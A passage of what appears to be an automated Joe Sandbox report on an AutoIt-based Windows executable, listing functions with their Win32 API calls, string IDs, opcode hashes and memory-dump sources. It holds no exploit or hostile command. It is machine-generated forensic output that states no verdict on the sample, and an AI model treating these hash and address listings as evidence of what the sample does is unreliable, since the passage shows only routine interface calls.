                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                  • String ID: CALLARGARRAY
                                                                                                                                                                                                                                  • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                  • Opcode ID: 5c3227154225933504792402ee42836d2d5e9912ca2460f718b3532800625334
                                                                                                                                                                                                                                  • Instruction ID: 330a1ea79dbaa657c2b5b920ff4a7b114be6338077d62bcb4333876eee6208f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c3227154225933504792402ee42836d2d5e9912ca2460f718b3532800625334
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5541BE71E002199FCB04DFA8C885AFEBBB5FF99364F104169E506E7252E7719D81CB90
                                                                                                                                                                                                                                  Function 00A24008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00A240BD
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A240F8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                  • Opcode ID: 5a540dddefdc7d55389c24c8c1b1bc7d8edb8201caf7a22636a0fefefb1bb79a
                                                                                                                                                                                                                                  • Instruction ID: fae99a9ba8a62db3cde9569a286d8fc8b84e8b0b77ca189ddd58dbe30992b7a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a540dddefdc7d55389c24c8c1b1bc7d8edb8201caf7a22636a0fefefb1bb79a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8319071114614AADB20DF78DC80BFB77A9FF48720F008629F99987190DA75AC81C760
                                                                                                                                                                                                                                  Function 00A24FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00A250BD
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A250D2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID: '
                                                                                                                                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                  • Opcode ID: 2b0123e667a72c0c1470442441411ad4611ecac02c2f61bac8ddd33ef08bff74
                                                                                                                                                                                                                                  • Instruction ID: 1b29d7674fb144c249d06bd1e171743c38755522877882bb870527123cde86ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b0123e667a72c0c1470442441411ad4611ecac02c2f61bac8ddd33ef08bff74
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58313674E0461A9FDB14CFA9D880BEABBB5FF49300F10406AE904AB391D771A945CF90
                                                                                                                                                                                                                                  Function 00A23C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A23D18
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A23D23
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID: Combobox
                                                                                                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                  • Opcode ID: f72a73c9b54c3b370a2227117aef5cad2b15c538218e431ab9d28eb47b7f8220
                                                                                                                                                                                                                                  • Instruction ID: af8824592c39216859499910dcbda9e716781222037843ae4960173dd2f0b4af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f72a73c9b54c3b370a2227117aef5cad2b15c538218e431ab9d28eb47b7f8220
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1811D0726002186FEF11CF58EC80FBB3B6AEB893A4F104534F914A7290D679DD518BA0
                                                                                                                                                                                                                                  Function 00A241AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00997873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009978B1
                                                                                                                                                                                                                                    • Part of subcall function 00997873: GetStockObject.GDI32(00000011), ref: 009978C5
                                                                                                                                                                                                                                    • Part of subcall function 00997873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009978CF
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00A24216
                                                                                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 00A24230
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                  • Opcode ID: 97f070fab78c71e0a23b763dc0131877ceb4185330c23a37266abd6b3a790959
                                                                                                                                                                                                                                  • Instruction ID: f8ef2e43765e634f2e90443a6901bca04bc87c2aaafa39c983254dfa7c29cd57
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97f070fab78c71e0a23b763dc0131877ceb4185330c23a37266abd6b3a790959
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85112372610219AFDB00DFADDC45AFA7BB8EB08314F015928FD55E3251E674E8619B60
                                                                                                                                                                                                                                  Function 009F75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 009F761D
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009F7629
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                  • String ID: STOP
                                                                                                                                                                                                                                  • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                  • Opcode ID: 460da9b8a6ba772935e8783fe94a0965bc519dc05a4cfd4f69dd4923398600a3
                                                                                                                                                                                                                                  • Instruction ID: 1e495332b66d5e30fe58eabf2454db5dedbba437cba9c373ecf29f1186a570bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 460da9b8a6ba772935e8783fe94a0965bc519dc05a4cfd4f69dd4923398600a3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8010032A0892E8BCB20AFFCDC449BFB3B9BBA07547400924E921D3291EB35D904C351
                                                                                                                                                                                                                                  Function 009F262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009F2699
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                  • Opcode ID: cbb64d1e85818c5ef5a18c4031ebde98cf764eb512facdf1cb8fc453af788af6
                                                                                                                                                                                                                                  • Instruction ID: f06897b9ed3e87665dd1dceca4c94023365c3165cb450e97f77d756fbf893733
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbb64d1e85818c5ef5a18c4031ebde98cf764eb512facdf1cb8fc453af788af6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D801D475A41218ABCF04EBA8CC55EFE7768FF86360B400A1AB932972C1DA35590DCB50
                                                                                                                                                                                                                                  Function 009F2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 009F2593
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                  • Opcode ID: 0e79e7a750c7bddd982c74b7bebb84b621051fb470617b81481c83ee6627ad74
                                                                                                                                                                                                                                  • Instruction ID: 086ce287cc0d4b251be2e0a3fba73263d44b4201eeba03a8a266210e143e0951
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e79e7a750c7bddd982c74b7bebb84b621051fb470617b81481c83ee6627ad74
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01A775A411087BCF04E794D966FFF77A8DF85351F5000297902A32C1DA249E0CC7B1
                                                                                                                                                                                                                                  Function 009F25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 009F2615
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                  • Opcode ID: 3784ef4690ddb780aa398b6b91aec50f6c49cf01558674a35fcee24f6a2c178a
                                                                                                                                                                                                                                  • Instruction ID: fc7c166fd9d018103bc5a779e150ec4847cb130c6f6720c41bd5017413689828
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3784ef4690ddb780aa398b6b91aec50f6c49cf01558674a35fcee24f6a2c178a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8301A275A4110866CF15E7A4D902FFF77A89B45340F500026B902E32C1DA698E09D7B1
                                                                                                                                                                                                                                  Function 009F26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009F2720
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                  • Opcode ID: c70b9aeb7679db739137f3a973e01b3f889cd35ebde0449aca8e455561951438
                                                                                                                                                                                                                                  • Instruction ID: 35974c3e1fe33497a290b024ad34b582034756c94a753c14e8be2b513f92ba84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c70b9aeb7679db739137f3a973e01b3f889cd35ebde0449aca8e455561951438
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24F0F475A4121866CB04F3A89C52FFE776CAF41390F400915B922A32C1DB74690CC7A0
                                                                                                                                                                                                                                  Function 009F1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009F146F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                  • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                  • Opcode ID: c2aaa4c333e7cec11d43958cf8405cdd70acf54fb6bbdf800ca12ffdb85dd683
                                                                                                                                                                                                                                  • Instruction ID: ea4abb7713bd68bc96a4609a487274110496a6e4ffffb275fcf2722de2a66409
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2aaa4c333e7cec11d43958cf8405cdd70acf54fb6bbdf800ca12ffdb85dd683
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE0D83124C3283AD624279CBC03FD976849F45B71F11482AF748694C34EF2649042D9
                                                                                                                                                                                                                                  Function 009EE778 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(5600A586,?), ref: 009EE797
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 009EE7BD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID: X64
                                                                                                                                                                                                                                  • API String ID: 3013587201-893830106
                                                                                                                                                                                                                                  • Opcode ID: d08ef136b1f8ca0f0d8dfe7985093121561c76660c0b2c398022784090df14ab
                                                                                                                                                                                                                                  • Instruction ID: c15659558c71df2b90ae182bf65ce987f5c9ab34b94c30d6cec7d7956bece1e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d08ef136b1f8ca0f0d8dfe7985093121561c76660c0b2c398022784090df14ab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20E02B71805691DBD73397A04C4CE643638BF11B00B144AECE406EB422DB25CC85C755
                                                                                                                                                                                                                                  Function 009B10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009AFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009B10E2,?,?,?,0099100A), ref: 009AFAD9
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0099100A), ref: 009B10E6
                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0099100A), ref: 009B10F5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009B10F0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                  • API String ID: 55579361-631824599
                                                                                                                                                                                                                                  • Opcode ID: 58869c77a7c5342537714f9717c3f66361ec5a42d16f18e83f1134d50ba30408
                                                                                                                                                                                                                                  • Instruction ID: fb8e10f2c6eba5a92673922993c986b74eb3981e567cd5b1b211045a63ff9206
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58869c77a7c5342537714f9717c3f66361ec5a42d16f18e83f1134d50ba30408
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39E06D706047108FD330EF68E928782BBF4EB00711F108D2CE885C2652EBB4D445CB91
                                                                                                                                                                                                                                  Function 00A039D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
